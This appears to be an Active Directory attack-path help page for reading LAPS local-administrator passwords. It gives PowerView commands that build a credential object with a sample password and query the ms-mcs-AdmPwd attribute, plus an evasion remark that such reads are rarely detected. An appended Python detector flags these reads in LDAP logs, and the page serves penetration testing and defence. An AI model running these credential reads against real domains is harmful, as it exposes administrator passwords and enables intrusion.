This privilege allows you to read the LAPS password from a computer.
Abuse Info
You may need to authenticate to the Domain Controller as the user with full control over the target user if you are not running a process as that user. To do this in conjunction with Get-DomainObject, first create a PSCredential object (these examples come from the PowerView help documentation):
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Then, use Get-DomainObject, optionally specifying $Cred if you are not already running a process as the user with full control over the target user.
Get-DomainObject -Credential $Cred -Identity windows10 -Properties "ms-mcs-AdmPwd",name
Opsec Considerations
Reading properties from LDAP is extremely low risk, and can only be detected by monitoring LDAP queries.
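The LDAP query monitoring mentioned above, sketched as an added example (not from the original page or from PowerView): it scans LDAP search records for reads of ms-Mcs-AdmPwd by accounts that are not expected LAPS readers. The JSON-lines schema, the sample records and the allowlisted account svc-laps-helpdesk are constructed assumptions.

```python
import json

LAPS_ATTR = "ms-mcs-admpwd"  # attribute named on the page, compared lower-cased
# Assumption: accounts that are supposed to read LAPS passwords (hypothetical name).
EXPECTED_READERS = {r"testlab\svc-laps-helpdesk"}

# Constructed sample records, one LDAP search per line; the schema is hypothetical.
SAMPLE_LOG = r'''
{"ts":"2024-05-01T10:00:00Z","user":"TESTLAB\\svc-laps-helpdesk","filter":"(name=windows10)","attrs":["ms-Mcs-AdmPwd","name"]}
{"ts":"2024-05-01T10:02:11Z","user":"TESTLAB\\dfm.a","filter":"(name=windows10)","attrs":["ms-mcs-AdmPwd","name"]}
{"ts":"2024-05-01T10:03:40Z","user":"TESTLAB\\dfm.a","filter":"(&(objectCategory=computer)(ms-Mcs-AdmPwd=*))","attrs":["name"]}
{"ts":"2024-05-01T10:05:00Z","user":"TESTLAB\\jsmith","filter":"(objectClass=user)","attrs":["sAMAccountName"]}
{"ts":"2024-05-01T10:06:30Z","user":"TESTLAB\\jsmith","filter":"(name=windows10)","attrs":["*"]}
not-json garbage line
'''

def classify(event):
    """Return why a search touches the LAPS attribute, or None if it does not."""
    attrs = {a.lower() for a in event.get("attrs", [])}
    if LAPS_ATTR in attrs:
        return "explicit-attribute-request"
    if LAPS_ATTR in event.get("filter", "").lower():
        return "attribute-in-filter"
    # An empty list or "*" asks for all user attributes, which can include
    # the LAPS attribute when the caller has read rights; lower confidence.
    if "*" in attrs or not attrs:
        return "wildcard-may-return-attribute"
    return None

def detect(log_text, expected=EXPECTED_READERS):
    """Parse JSON-lines search records; return findings for unexpected readers."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records instead of aborting the run
        reason = classify(event)
        if reason and event.get("user", "").lower() not in expected:
            findings.append((event.get("ts"), event.get("user"), reason))
    return findings

if __name__ == "__main__":
    for ts, user, reason in detect(SAMPLE_LOG):
        print(ts, user, reason)
```

The wildcard category is noisy on a busy directory and is best treated as context for the two explicit categories rather than as an alert on its own.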